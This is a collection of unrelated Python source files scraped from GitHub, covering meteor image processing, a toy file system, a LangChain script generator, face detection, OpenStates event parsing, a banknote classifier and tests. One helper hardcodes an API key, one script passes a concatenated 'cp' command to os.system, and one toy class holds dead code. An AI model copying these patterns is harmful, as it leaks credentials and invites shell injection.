\"manual\" not in json_file and \"starmerge\" not in json_file and \"master\" not in json_file:\n vfn = json_file.split(\"/\")[-1].replace(\".json\", \".mp4\")\n mfiles.append(vfn)\n return(mfiles)\n\ndef load_meteors_for_day(date, station_id):\n mdir = \"/mnt/ams2/meteors/\" + date + \"/\"\n msdir = \"/mnt/ams2/METEOR_SCAN/\" + date + \"/\"\n print(mdir)\n if os.path.isdir(msdir) is False:\n os.makedirs(msdir)\n mfiles = get_mfiles(mdir)\n roi_files = []\n for ff in sorted(mfiles, reverse=True):\n print(ff)\n if \"/\" in ff:\n ff = ff.split(\"/\")[-1]\n if \"\\\\\" in ff:\n ff = ff.split(\"\\\\\")[-1]\n json_file = ff.replace(\".mp4\", \".json\")\n roi_file = station_id + \"_\" + ff.replace(\".mp4\", \"-ROI.jpg\")\n stack_file = ff.replace(\".mp4\", \"-stacked.jpg\")\n mjrf = json_file.replace(\".json\", \"-reduced.json\")\n\n if os.path.exists(msdir + roi_file) is False:\n print(\"NO ROI!\", msdir + roi_file)\n if os.path.exists(mdir + mjrf):\n mjr = load_json_file(mdir + mjrf)\n if \"meteor_frame_data\" not in mjr:\n continue\n print(\"MFD:\", len(mjr['meteor_frame_data']))\n if len(mjr['meteor_frame_data']) == 0:\n continue\n\n\n x1,y1,x2,y2 = mfd_roi(mjr['meteor_frame_data'])\n img = cv2.imread(mdir + stack_file)\n print(mdir + stack_file)\n try:\n img = cv2.resize(img, (1920,1080))\n roi_img = img[y1:y2,x1:x2]\n #cv2.imshow('pepe', roi_img)\n #cv2.waitKey(30)\n cv2.imwrite(msdir + roi_file, roi_img)\n except:\n continue\n else:\n print(\"NOT REDUCED :\", mdir , mjrf)\n else:\n print(\"GOOD ROI !\", msdir + roi_file)\n if os.path.exists(msdir + roi_file) is True:\n roi_files.append(msdir + roi_file)\n learn_dir = \"/mnt/ams2/datasets/images/repo/meteors/\"\n non_met_learn_dir = \"/mnt/ams2/datasets/images/repo/nonmeteors/\"\n if os.path.isdir(learn_dir) is False:\n os.makedirs(learn_dir)\n for rf in roi_files:\n fn = rf.split(\"/\")[-1]\n learn_file = learn_dir + fn\n non_m_learn_file = non_met_learn_dir + fn\n if os.path.exists(learn_file) is True or os.path.exists(non_m_learn_file) is True:\n print(\"Learn file exists.\", learn_file)\n else:\n print(\"Learn file not found.\", learn_file)\n cmd = \"cp \" + rf + \" \" + learn_file\n print(cmd)\n os.system(cmd)\n model = \"./first_try_model.h5\"\n label = \"meteors\"\n\n predict_images(roi_files, model, label )\n #exit()\njson_conf = load_json_file(\"../conf/as6.json\")\nmdirs = glob.glob(\"/mnt/ams2/meteors/*\")\nfor md in sorted(mdirs,reverse=True):\n if os.path.isdir(md) is True:\n date = md.split(\"/\")[-1]\n load_meteors_for_day(date, json_conf['site']['ams_id'])\n","repo_name":"mikehankey/amscams","sub_path":"pipeline/Meteor_Repo.py","file_name":"Meteor_Repo.py","file_ext":"py","file_size_in_byte":3389,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"27"} +{"seq_id":"72611171593","text":"#! Ran on Python 3.8.10\r\nimport math\r\n\r\n\r\nclass FileSystem:\r\n def __init__(self):\r\n self.file = [[] for i in range(10)]\r\n\r\n def createFile(self, inFilename: str, readOnly: bool):\r\n if self.file.count([]) == 0:\r\n return -1 # ! File system is full\r\n\r\n for i, j in enumerate(self.file):\r\n if not j:\r\n self.file[i] = [inFilename, readOnly, \"\"]\r\n break\r\n print(inFilename)\r\n\r\n def deleteFile(self, inFilename: str):\r\n begin_count = self.file.count([])\r\n \r\n for i,j in enumerate(self.file):\r\n if j:\r\n if j[0] == inFilename:\r\n self.file[i] = []\r\n \r\n \r\n \r\n end_count = self.file.count([])\r\n \r\n if begin_count == end_count:\r\n return print(0) #! File does not exist\r\n \r\n return print(1) #! File deleted successfully\r\n \r\n \r\n #! Remove all files with the same name\r\n self.file = [x for x in self.file if x[0] != inFilename]\r\n \r\n\r\n #! Used length of the list to check if the file was deleted\r\n if prelen == postlen:\r\n return 0\r\n\r\n return 1\r\n\r\n def readFile(self, inFilename):\r\n\r\n for i in self.file:\r\n if i:\r\n if i[0] == inFilename:\r\n print(i[2], end='') # ! prints the message without newline\r\n print()\r\n\r\n def writefile(self, inFilename, inMessage):\r\n # ! Number of blocks needed for message\r\n message_block = math.ceil(len(inMessage) / 10)\r\n \r\n\r\n \r\n if not [inFilename, False, \"\"] in self.file:\r\n return print(0) # ! File is read only or does not exist \r\n \r\n index_of_head = self.file.index([inFilename, False, \"\"])\r\n \r\n if self.file.count([]) + 1 - message_block < 0:\r\n self.file[index_of_head] = []\r\n return print(0) # ! File system is full\r\n \r\n #! split strings into blocks of 10\r\n string_split = [inMessage[y-10:y] for y in range(10, len(inMessage)+10, 10)]\r\n\r\n #! insert the blocks into the file system\r\n self.file[index_of_head][2] = string_split.pop(0)\r\n \r\n while string_split:\r\n empty_index = self.file.index([])\r\n self.file[empty_index] = [inFilename, False, string_split.pop(0)]\r\n \r\n print(1)\r\n\r\ndef main():\r\n fs = FileSystem()\r\n \r\n fs.createFile(\"file1\", False)\r\n fs.writefile(\"file1\", \"This is the first phrase.\")\r\n \r\n fs.createFile(\"file2\", False)\r\n fs.writefile(\"file2\", \"Goodbye, cruel World! I can take it no more!!\")\r\n \r\n fs.readFile(\"file1\")\r\n fs.readFile(\"file2\")\r\n \r\n fs.deleteFile(\"file1\")\r\n \r\n fs.createFile(\"file3\", False)\r\n fs.writefile(\"file3\", \"No! Wait!! I'm feeling better now!\")\r\n fs.readFile(\"file3\")\r\n \r\n fs.deleteFile(\"file2\")\r\n \r\n fs.createFile(\"file4\", False)\r\n fs.writefile(\"file4\", \"Eighteen chars!!!!\")\r\n fs.readFile(\"file4\")\r\n \r\n #! This should fail due to lack of space \r\n fs.createFile(\"file5\", False)\r\n fs.writefile(\"file5\", \"This is a very long string that is 55 characters long..\")\r\n \r\n fs.createFile(\"file6\", False)\r\n fs.writefile(\"file6\", \"We need a string with length 32.\")\r\n fs.readFile(\"file6\")\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"Em3raud3/cs330_Operating_System","sub_path":"FileSystemTest.py","file_name":"FileSystemTest.py","file_ext":"py","file_size_in_byte":3404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"73077363913","text":"import os\nfrom dotenv import load_dotenv\nimport streamlit as st\nimport time\nfrom langchain.llms import OpenAI\nfrom langchain.prompts import PromptTemplate\nfrom langchain.chains import LLMChain\nfrom langchain.memory import ConversationBufferMemory\nfrom langchain.utilities import WikipediaAPIWrapper\n\nload_dotenv()\nopenai_api_key = os.environ['OPENAI_API_KEY'] \n\n# # os.environ['OPENAI_API_KEY'] = st.secrets['OPENAI_API_KEY']\n\n\nst.title('🫵🚇Youtube Video Script Generator')\nst.write(\"\")\nprompt = st.text_input('Enter a prompt for the AI to complete')\n\n\n\n#prompt template\ntitle_template = PromptTemplate(\n input_variables = ['topic'],\n template = 'write me a youtube video title about {topic}'\n)\n\nscript_template = PromptTemplate(\n input_variables = ['title', 'wikipedia_research'],\n template = 'write me a youtube video script about this title: {title} while leveraging this wikipedia research: {wikipedia_research}'\n)\n\ntitle_memory = ConversationBufferMemory(input_key='topic', memory_key='title_memory')\nscript_memory = ConversationBufferMemory(input_key='title', memory_key='script_memory')\n\n\nllm = OpenAI(temperature=0.9)\ntitle_chain = LLMChain(llm = llm, prompt = title_template, verbose=True, output_key='title', memory=title_memory)\nscript_chain = LLMChain(llm = llm, prompt = script_template, verbose=True, output_key='script', memory=script_memory)\n\nwiki = WikipediaAPIWrapper()\n\nst.sidebar.title('Script Generation Details')\n\nif prompt:\n \n title = title_chain.run(prompt)\n wiki_research = wiki.run(prompt)\n script = script_chain.run(title=title, wikipedia_research=wiki_research)\n\n progress_bar = st.progress(0)\n for i in range(100):\n time.sleep(0.01)\n progress_bar.progress(i + 1)\n\n st.write(\"\")\n st.write(\n 'Title:',\n unsafe_allow_html=True,\n )\n st.write(title)\n st.write(\"\")\n st.write(\n 'Script:',\n unsafe_allow_html=True,\n )\n st.write(script)\n st.write(\"\") \n\n with st.sidebar.expander('Wikipedia Research'):\n st.info(wiki_research)\n\n with st.sidebar.expander('Title history'):\n st.info(title_memory.buffer)\n \n with st.sidebar.expander('Script history'):\n st.info(script_memory.buffer)\n \n st.success(\"Script Generated Successfully!\")\n st.write(\"\")\n\n \n \n \n","repo_name":"collinshen123/LangChain-YT-script-generator","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"34987361880","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Jan 24 21:00:53 2022\r\n\r\n@author: Doshite368\r\n\"\"\"\r\n\r\nn = input()\r\n\r\ncar = input().split()\r\n\r\ncnt = 0\r\n\r\nfor i in car:\r\n if n == i:\r\n cnt +=1\r\nprint(cnt)","repo_name":"PFSV/Baekjoon_Python","sub_path":"10797.py","file_name":"10797.py","file_ext":"py","file_size_in_byte":205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"2452863769","text":"import cv2 \n\n#Load some pre-trained data on face frontals from opencv (haar cascade algorithm)\ntrained_face_data = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\n\n#Capure video from webcam. \nwebcam = cv2.VideoCapture(0) #VideoCapture(video path or 0 which is the defualt camera)\n\n# Iterate forever over frames\nwhile True:\n\n #read the current frame\n successful_frame_read, frame = webcam.read()\n\n #Must convert to grayscale\n grayscaled_img = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n # Detect faces\n face_coordinates = trained_face_data.detectMultiScale(grayscaled_img)\n\n # Draw rectangles around the faces \n for (x, y, w, h) in face_coordinates:\n cv2.rectangle(frame, (x,y), (x+w, y + h), (0, 255, 0), 5) #rectangle(image, coordinates of the face, color, thickness of the rectangle)\n\n #shows the image in a window\n cv2.imshow(\"Face Detector\", frame)\n k = cv2.waitKey(1) & 0xff\n if k == 27:\n break\n\nwebcam.release()\n","repo_name":"sujan2003/Face-Detection-App","sub_path":"Face_Detector.py","file_name":"Face_Detector.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"14071412139","text":"\"\"\"\"Model performance visual evaluation\n\nThis script allows to visually compare predictions from a model and the\nground truth by drawing the segmentation on the image. All the images of\nthe validation dataset are computed and then stored on hard drive.\n\"\"\"\n\nimport argparse\nimport numpy as np\nimport torch\nfrom torch.utils.data import DataLoader\nfrom torchvision import transforms\nfrom models import UNet\nfrom medicalDataLoader import MedicalImageDataset\nfrom utils import getTargetSegmentation\nfrom matplotlib.colors import to_rgb, TABLEAU_COLORS\nfrom scipy.ndimage import sobel\nfrom PIL import Image\nfrom pathlib import Path, PurePath\n\n# left ventricle: 3\nleft_ventricle_colour = np.asarray(to_rgb(TABLEAU_COLORS['tab:orange'])) # could be blue\n# right ventricle: 1\nright_ventricle_colour = np.asarray(to_rgb(TABLEAU_COLORS['tab:cyan'])) # could be red\n# myocardium: 2\nmyocardium_colour = np.asarray(to_rgb(TABLEAU_COLORS['tab:green'])) # could be green\n\nred = np.asarray(to_rgb(TABLEAU_COLORS['tab:red']))\npred_mask_enhancement = 1\n\n\ndef edges(mask):\n mask = np.asarray(mask)\n augmented_mask = mask * 255 # convert to black and white mask for better sobel performances\n sx = sobel(augmented_mask, axis=0, mode='constant')\n sy = sobel(augmented_mask, axis=1, mode='constant')\n sob = np.hypot(sx, sy)\n sob_max = np.max(sob)\n return (sob > (sob_max / 2.0)) & mask # not to go beyond the contours of segmentation\n\n\ndef main(weights, root_dir, model_name):\n with torch.inference_mode():\n # Load model abd weights\n model = UNet(n_channels=1, n_classes=4)\n model.load_state_dict(torch.load(weights))\n model.eval()\n\n # Initialize dataset\n transformer = transforms.ToTensor()\n val_set = MedicalImageDataset('val', root_dir, transformer, transformer)\n val_loader = DataLoader(val_set, shuffle=False)\n\n # Target directory where images will be saved\n directory = Path.cwd() / 'Results/Images' / model_name / PurePath(weights).name\n directory.mkdir(parents=True, exist_ok=True)\n\n # Iterate over all images of the validation dataset\n for i, data in enumerate(val_loader):\n\n images, labels, img_names = data\n image = images[0, 0] # image 0, channel 0\n label = labels[0, 0]\n\n # Retrieve Ground truth and predictions from the model\n gt = getTargetSegmentation(label)\n pred = model(images)\n pred = pred.detach().numpy()\n pred = np.argmax(pred[0], axis=0)\n\n # prepare the base image for manipulations\n res = np.asarray(image) # From Tensor to ndarray\n res = np.expand_dims(res, 2) # Creating a third dimension for colours\n res = np.repeat(res, 3, axis=2) # Fill the 3 colours channels with the grey scale\n\n # Add segmentation highlights to the image\n res[pred == 1] *= right_ventricle_colour * pred_mask_enhancement\n res[pred == 2] *= myocardium_colour * pred_mask_enhancement\n res[pred == 3] *= left_ventricle_colour * pred_mask_enhancement\n res[edges(pred == 1)] = right_ventricle_colour\n res[edges(pred == 2)] = myocardium_colour\n res[edges(pred == 3)] = left_ventricle_colour\n res[edges(gt == 1)] = red\n res[edges(gt == 2)] = red\n res[edges(gt == 3)] = red\n\n # Convert from normalized image to 3-bytes pixels image\n res *= 255\n res = res.astype(np.uint8)\n\n # save the image\n filename = directory / PurePath(img_names[0]).name\n print(f'Saving {filename}...')\n im = Image.fromarray(res.astype(np.uint8), mode='RGB')\n im.save(filename)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-f\", \"--weights-file\", type=str)\n parser.add_argument('-d', '--root-dir', default=\"../Data/\", type=str)\n parser.add_argument('--model-name', default=\"ModelStats\", type=str)\n args = parser.parse_args()\n main(weights=args.weights_file,\n root_dir=args.root_dir,\n model_name=args.model_name)\n","repo_name":"nowtryz/SubUnet","sub_path":"Source Code/evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":4184,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"31524403930","text":"#!/usr/bin/env python2.7\r\n# -*- coding: utf8 -*-\r\n\r\n\"\"\"\r\nFile: events_API_helper.py\r\nAuthor: Andrew Rose\r\nDate: 4/13/2017\r\nLast Updated: 4/13/2017\r\n\r\nDescription:\r\n -This file offers helper methods for scripts that take event data from OpenStates.\r\n\r\nSource:\r\n -OpenStates API\r\n\"\"\"\r\n\r\nimport requests\r\nimport json\r\nimport datetime as dt\r\n\r\nEVENT_SEARCH_URL = \"https://openstates.org/api/v1/events/?state={0}\"\r\nEVENT_SEARCH_URL += \"&apikey=3017b0ca-3d4f-482b-9865-1c575283754a\"\r\n\r\nSTATE_METADATA_URL = \"https://openstates.org/api/v1/metadata/{0}/\"\r\nSTATE_METADATA_URL += \"?apikey=3017b0ca-3d4f-482b-9865-1c575283754a\"\r\n\r\n\r\n'''\r\nThis function builds and returns a list containing a dictionary for each event in the given state,\r\nused to fill the Hearing, CommitteeHearing, and HearingAgenda tables in our database.\r\n\r\nEach dictionary includes these fields:\r\n state: The state where the event occurs\r\n type: The type of hearing being held\r\n date_created: The date the event was posted\r\n date: The date the event occurs\r\n session_year: The session year the event occurs\r\n\r\n committees: A list of committees participating at the event.\r\n Each committee dictionary includes:\r\n house: The legislative house the committee belongs to\r\n comm: The name of the committee\r\n state: The state where the event occurs\r\n\r\n bills: A list of bills being discussed at the event.\r\n Each bill dictionary includes:\r\n bill: The ID number of the bill (bill type + bill number)\r\n type: The action being taken on the bill at the event\r\n state: The state where the event occurs\r\n session_year: The session year the bill was introduced\r\n'''\r\ndef get_event_list(state):\r\n api_url = EVENT_SEARCH_URL.format(state.lower())\r\n metadata_url = STATE_METADATA_URL.format(state.lower())\r\n\r\n event_json = requests.get(api_url).json()\r\n metadata = requests.get(metadata_url).json()\r\n\r\n event_list = list()\r\n for entry in event_json:\r\n event = dict()\r\n\r\n event['state'] = entry['state'].upper()\r\n if entry['type'] == 'committee:meeting':\r\n event['type'] = 'Regular'\r\n event['date_created'] = entry['created_at'].split(' ')[0]\r\n event['date'] = entry['when'].split(' ')[0]\r\n event['session_year'] = event['date'][:4]\r\n\r\n event['committees'] = list()\r\n for comm in entry['participants']:\r\n committee = dict()\r\n\r\n if comm['participant_type'] == 'committee':\r\n committee['house'] = metadata['chambers'][comm['chamber']]['name']\r\n committee['comm'] = comm['participant']\r\n committee['state'] = event['state']\r\n\r\n event['committees'].append(committee)\r\n\r\n event['bills'] = list()\r\n for bill in entry['related_bills']:\r\n bill_agenda = dict()\r\n\r\n bill = bill['bill_id'].split(' ')\r\n bill_agenda['type'] = bill[0]\r\n bill_agenda['number'] = bill[1]\r\n bill_agenda['state'] = event['state']\r\n bill_agenda['session_year'] = event['session_year']\r\n\r\n event['bills'].append(bill_agenda)\r\n\r\n event_list.append(event)\r\n\r\n return event_list\r\n","repo_name":"digitaldemocracy/dd-Data3.0","sub_path":"CurrentScripts/TX/events_API_helper.py","file_name":"events_API_helper.py","file_ext":"py","file_size_in_byte":3264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"71975144071","text":"def factorial(num):\n if num == 0:\n return 1\n else:\n return num * factorial(num - 1)\n\n# 利用列表存储递归过程的数据:\ndef factorial_li(num):\n l = [1, 1]\n for i in range(2, num+1):\n l.append(l[i-1]*i)\n return l[num]\n\nn = eval(input(\"Input a intege number:\"))\nprint(factorial(n))\nprint(factorial_li(n))\n\n\n\n\n","repo_name":"Chenpeel/Codes","sub_path":"Python/basic_learn/basic_lan/factorial.py","file_name":"factorial.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"7486604095","text":"import glob\nimport os\nimport pandas as pd\n\nclass Data:\n\n def __init__(self, datapath, dayofweek):\n \"\"\"\n Initialization: where all initial conditions are listed\n :param datapath: path to the file\n :param dayofweek: lower case 3 letters for the day of the week\n \"\"\"\n self.data_path = datapath\n self.dayofweek = dayofweek\n\n def get_all_files(self):\n return glob.glob(f'{self.data_path}/*csv')\n\n def read_file(self):\n\n all_files = self.get_all_files()\n days_of_week = [i.split(\"/\")[1][0:3] for i in all_files]\n for day in days_of_week:\n if day == self.dayofweek:\n index = days_of_week.index(day)\n return pd.read_csv(all_files[index], sep = \";\", index_col=0, parse_dates=True)\n\n\n## This lines are meant to test the class if it does what it is meant to do!\ndata_path = \"data/\"\ndayofweek = \"fri\"\nobj = Data(data_path, dayofweek)\n\n# print(obj.read_file())\n","repo_name":"Amaranga/markov_ki-supermarket_simulation","sub_path":"read_files.py","file_name":"read_files.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"30197741475","text":"\n\nimport pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import accuracy_score\nimport pickle\n\nclass Akshay:\n def __init__(self, link='https://raw.githubusercontent.com/krishnaik06/FastAPI/main/BankNote_Authentication.csv'):\n self.link = link\n self.df = pd.read_csv(self.link)\n\n def split(self):\n X = self.df.drop('class', axis=1)\n y = self.df['class']\n return X, y\n\n def train_test_split(self, X, y):\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.33, random_state=42)\n return X_train, X_test, y_train, y_test\n\n def classify(self, X_train, y_train):\n classifier = RandomForestClassifier()\n classifier.fit(X_train, y_train)\n return classifier\n\n def pred(self, classifier, X_test):\n y_pred = classifier.predict(X_test)\n return y_pred\n\n def get_accuracy_score(self, y_test, y_pred):\n score = accuracy_score(y_test, y_pred)\n return score\n\n def save_model(self, classifier):\n with open('classifier.pkl', 'wb') as f:\n pickle.dump(classifier, f)\n\nif __name__ == '__main__':\n a = Akshay()\n X, y = a.split()\n X_train, X_test, y_train, y_test = a.train_test_split(X, y)\n classifier = a.classify(X_train, y_train)\n y_pred = a.pred(classifier, X_test)\n score = a.get_accuracy_score(y_test, y_pred)\n print(f'Accuracy: {score}')\n a.save_model(classifier)\n","repo_name":"akshaykadam9/bank_note_with_FastAPI","sub_path":"ak.py","file_name":"ak.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"26064241829","text":"\"\"\"\r\n Important Points::\r\n => We cannot add mutable objects (list, dict, set) as elements into set but we can add elements of immutable objects\r\n into set\r\n => We can add immutable objects (tuple) as elements into set\r\n => update() only adds the elements of sequences(list, dict, tuple, set) into set\r\n\"\"\"\r\nif __name__ == '__main__':\r\n # adding list element into set\r\n numbers_list = [5, 6, 7, 8, 9, 10]\r\n numbers_set = set([1, 2, 3, 4])\r\n\r\n numbers_set.update(numbers_list)\r\n print(numbers_set)\r\n\r\n # adding dict elements(keys, values, key:value pairs) into set\r\n names_dict = {1: 'Arslan', 2: 'Haider', 3: 'Sherazi'}\r\n names_set = set(['Waqar', 'Haider', 'Sherazi'])\r\n\r\n names_set.update(names_dict.items()) # adding key:value pairs\r\n print(names_set)\r\n names_set.update(names_dict) # adding keys\r\n print(names_set)\r\n names_set.update(names_dict.values()) # adding values\r\n print(names_set)\r\n\r\n # adding set's elements into set\r\n numbers = {1, 2, 2, 3, 4, 5, 6, 7, 8}\r\n numbers_set = set()\r\n\r\n numbers_set.update(numbers)\r\n print(numbers_set)\r\n\r\n # adding tuples as elements of set\r\n tup1 = (1, 2, 2, 3)\r\n tup2 = (4, 4, 5, 6, 7, 8)\r\n tup3 = (4, 4, 5, 6, 7, 8) # it will be discarded because of duplication\r\n numbers_set = set([tup1, tup2, tup3])\r\n print(numbers_set)\r\n\r\n for tup in numbers_set:\r\n print(tup)\r\n for ele in tup:\r\n print(ele, end=\" \")\r\n print()\r\n","repo_name":"arslansherazi/python-core-code-snippets","sub_path":"3-data_structures/set/4-complex_set.py","file_name":"4-complex_set.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"9947696039","text":"import arrow\nimport pytest as pt\n\nimport src.adapters.incoming.usecases.find_pilot_use_case as uc\nfrom src.adapters.incoming.controller import FindCrewRequest\n\n\n@pt.fixture\ndef valid_request():\n depart_on = arrow.utcnow()\n return_on = arrow.utcnow().shift(days=2)\n return FindCrewRequest('Munich', depart_on, return_on)\n\n\nclass JsonDataStoreFake:\n def __init__(self, pilots=None, all_flights_by_pilot=None):\n self.all_flights_by_pilot = {\n 1: [{}, {}, {}],\n 2: [{}, {}],\n 3: [{}],\n 4: [{}, {}, {}, {}],\n } if all_flights_by_pilot is None else all_flights_by_pilot\n\n self.pilots = [{'ID': 1}, {'ID': 2}, {'ID': 3}] if pilots is None else pilots\n\n def get_pilots_for(self, _location, _depart_on, _return_on):\n return self.pilots\n\n def get_all_flights_grouped_by_pilot(self):\n return self.all_flights_by_pilot\n\n\ndef test_no_pilots_found_for_request_params(valid_request):\n pilots_for_request = []\n\n pilot = uc.find_pilot_for(JsonDataStoreFake(pilots=pilots_for_request), valid_request)\n\n assert pilot == {}\n\n\ndef test_selects_only_pilot_found(valid_request):\n pilots_for_request = [\n {\n 'ID': 2\n }\n ]\n\n pilot = uc.find_pilot_for(JsonDataStoreFake(pilots=pilots_for_request), valid_request)\n\n assert pilot == {'ID': 2}\n\n\ndef test_selects_first_pilot_if_no_flights_data(valid_request):\n pilots_for_request = [\n {\n 'ID': 1\n },\n {\n 'ID': 2\n }\n ]\n\n pilot = uc.find_pilot_for(JsonDataStoreFake(pilots=pilots_for_request, all_flights_by_pilot={}), valid_request)\n\n assert pilot == {'ID': 1}\n\n\ndef test_selects_first_pilot_unutilised(valid_request):\n pilots_for_request = [\n {\n 'ID': 1\n },\n {\n 'ID': 2\n },\n {\n 'ID': 3\n }\n ]\n\n all_flights_by_pilot = {1: [{'ID': 1}]}\n pilot = uc.find_pilot_for(JsonDataStoreFake(pilots=pilots_for_request, all_flights_by_pilot=all_flights_by_pilot), valid_request)\n\n expected_pilot_with_no_utilisation = {'ID': 2}\n assert pilot == expected_pilot_with_no_utilisation\n\n\ndef test_selects_pilot_with_least_utilisation(valid_request):\n pilots_for_request = [\n {\n 'ID': 1\n },\n {\n 'ID': 2\n }\n ]\n\n flights_by_pilot = {\n 1: [\n {'ID': 1},\n {'ID': 1},\n {'ID': 1}\n ],\n 2: [\n {'ID': 2},\n {'ID': 2}\n ]\n }\n\n pilot = uc.find_pilot_for(JsonDataStoreFake(pilots=pilots_for_request, all_flights_by_pilot=flights_by_pilot), valid_request)\n\n expected_pilot_with_least_utilisation = {'ID': 2}\n assert pilot == expected_pilot_with_least_utilisation\n\n","repo_name":"sarahabimay/flight_crew_service","sub_path":"test/adapters/incoming/find_pilot_use_case_test.py","file_name":"find_pilot_use_case_test.py","file_ext":"py","file_size_in_byte":2800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"36110880727","text":"#! /usr/bin/env python3\n\nimport os\nimport time\nimport argparse\n\nimport math\nimport random\nimport warnings\nfrom numpy import finfo\nimport numpy as np\nimport sys\nfrom debugprint import print_debug\nfrom reader import TextMelIDLoader2, myDataLoader2\nfrom hparams import create_hparams, get_root_dir\nfrom model import Parrot\nfrom model.loss import ParrotLoss\nfrom logger import ParrotLogger\nfrom manage_model import create_model, build_model, restore_checkpoint, init_checkpoint_manager\n# uses tensorflow 2.2\nimport tensorflow as tf\nfrom tensorflow.keras import optimizers\nfrom tensorflow.keras.layers import Input\n\n\ndef format_time(time_sec):\n # print time in hour:minute:second\n time_sec = int(time_sec)\n t_hour = time_sec//3600\n # time_sec = time_sec-t_hour*3600\n t_minute = (time_sec % 3600)//60\n t_sec = time_sec % 60\n t_string = str(t_hour) + ':' + str(t_minute) + ':' + str(t_sec)\n return t_string\n\n\ndef prepare_dataloaders(hparams):\n # Get data, data loaders and collate function ready\n # use mel_training_list_filtered2 and phone_training_list_filtered3\n trainset = TextMelIDLoader2(hparams.root_dir, hparams.mel_training_list_filtered,\n hparams.mel_mean_std, hparams.phone_training_list_filtered)\n valset = TextMelIDLoader2(hparams.root_dir, hparams.mel_validation_list,\n hparams.mel_mean_std, hparams.phone_validation_list)\n collate_fn = []\n\n train_loader = myDataLoader2(trainset, batch_size=hparams.batch_size)\n\n return train_loader, valset, collate_fn\n\n\ndef prepare_directories_and_logger(output_directory, log_directory):\n if not os.path.isdir(output_directory):\n os.makedirs(output_directory, exist_ok=True)\n os.chmod(output_directory, 0o775)\n logger = ParrotLogger(os.path.join(output_directory, log_directory))\n\n return logger\n\n\ndef validate(model, criterion, valset, iteration, logger, batch_size, valstep=100):\n '''Handles all the validation scoring and printing'''\n print('')\n print(\"validate model\")\n\n val_loader = myDataLoader2(valset, batch_size=batch_size)\n # val_loader.randomize()\n val_loss_tts, val_loss_vc = 0.0, 0.0\n # number of losses and accuracies\n n_losses = 7\n n_acces = 3\n reduced_val_tts_losses, reduced_val_vc_losses = (np.zeros([n_losses], dtype=np.float32),\n np.zeros([n_losses], dtype=np.float32))\n reduced_val_tts_acces, reduced_val_vc_acces = (np.zeros([n_acces], dtype=np.float32),\n np.zeros([n_acces], dtype=np.float32))\n # num_sample = random.randint(0, len(val_loader)-1)\n for step in range(0, min(len(val_loader), valstep)):\n # start = time.time()\n\n use_text = step % 2 == 0\n if step % 50 == 0:\n print('%d/%d steps' % (step+1, min(len(val_loader), valstep)), end='\\r')\n (text_input_phonelevel_padded, text_input_padded, mel_padded, mat_onehot_padded,\n expand_mat_padded, speaker_id, text_lengths, mel_lengths,\n stop_token_padded) = val_loader[step]\n\n mel_reference = [] # unused\n (mel_padded_out, mel_padded_post_out, speaker_logit_from_mel,\n speaker_logit_from_mel_hidden_text_rate,\n text_hidden, mel_hidden, mel_hidden_text_rate,\n text_logit_from_mel_hidden) = model([mel_padded, text_input_padded,\n mel_lengths, expand_mat_padded,\n mat_onehot_padded, speaker_id, mel_reference], use_text,\n training=False, do_voice_conversion=False)\n if step == 0:\n # get a randomly chosen sentence data\n mel_reference = [] # unused\n outmod = model([mel_padded, text_input_padded, mel_lengths, expand_mat_padded,\n mat_onehot_padded, speaker_id, mel_reference],\n use_text=True, training=False, do_voice_conversion=False)\n mel_tts = mel_padded\n mel_tts_pred = outmod[1]\n\n outmod = model([mel_padded, text_input_padded, mel_lengths, expand_mat_padded,\n mat_onehot_padded, speaker_id, mel_reference],\n use_text=False, training=False, do_voice_conversion=False)\n mel_vc = mel_padded\n mel_vc_pred = outmod[1]\n\n # Compute the loss value for this minibatch.\n model_outputs = [mel_padded_out, mel_padded_post_out, mel_lengths, text_lengths,\n speaker_logit_from_mel, speaker_logit_from_mel_hidden_text_rate,\n expand_mat_padded, text_input_padded, text_hidden, mel_hidden, mel_hidden_text_rate,\n text_logit_from_mel_hidden, text_input_phonelevel_padded, mat_onehot_padded]\n\n targets = mel_padded\n\n loss_list, accuracy_list, combined_loss1, combined_loss2 = \\\n criterion.compute_loss(model_outputs, targets, speaker_id)\n\n if step % 2 == 0:\n val_loss_tts += combined_loss1\n reduced_val_tts_losses += np.array([val.numpy() for val in loss_list])\n reduced_val_tts_acces += np.array([acc.numpy() for acc in accuracy_list])\n else:\n val_loss_vc += combined_loss1\n reduced_val_vc_losses += np.array([val.numpy() for val in loss_list])\n reduced_val_vc_acces += np.array([acc.numpy() for acc in accuracy_list])\n\n if step % 2 == 0:\n num_tts = step/2+1\n num_vc = step/2\n else:\n num_tts = 